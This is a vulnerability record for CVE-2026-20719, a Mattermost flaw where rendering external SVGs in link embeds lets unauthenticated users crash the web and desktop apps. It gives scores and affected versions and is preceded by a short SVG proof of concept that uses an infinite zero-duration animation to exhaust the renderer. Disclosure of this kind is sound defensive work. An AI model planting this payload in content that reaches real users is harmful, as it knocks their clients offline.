CVE-2026-20719

<!-- Malicious SVG PoC to crash renderer --> <svg xmlns="http://www.w3.org/2000/svg"> <defs> <style> /* Example of a resource exhaustion payload */ circle { animation: spin 0s infinite linear; } @keyframes spin { 100% { transform: rotate(360deg); } } </style> </defs> <circle cx="50" cy="50" r="40" /> </svg>

{"cve": {"id": "CVE-2026-20719", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:30.307", "lastModified": "2026-03-26T18:54:18.977", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to prevent rendering of external SVGs on link embeds which allows unauthenticated users to crash the Mattermost webapp and desktop app via creating an issue or PR on GitHub.. Mattermost Advisory ID: MMSA-2026-00595"}, {"lang": "es", "value": "Las versiones de Mattermost 11.4.x &lt;= 11.4.0, 11.3.x &lt;= 11.3.1, 11.2.x &lt;= 11.2.3, 10.11.x &lt;= 10.11.11 no impiden la renderización de SVG externos en incrustaciones de enlaces, lo que permite a usuarios no autenticados bloquear la aplicación web y la aplicación de escritorio de Mattermost mediante la creación de una incidencia o una PR en GitHub. ID de aviso de Mattermost: MMSA-2026-00595"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.12", "matchCriteriaId": "D144BD1D-F65C-498D-BC8A-F3D718F47F4B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.2.0", "versionEndExcluding": "11.2.4", "matchCriteriaId": "2E3E9B61-F003-45E4-9A04-8015A5CB8558"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.3.0", "versionEndExcluding": "11.3.2", "matchCriteriaId": "805ECFFC-82FD-4754-AF95-32167E1D41CB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.4.0", "versionEndExcluding": "11.4.1", "matchCriteriaId": "839BC7B7-28DF-4125-937A-8B0D2D6893C2"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}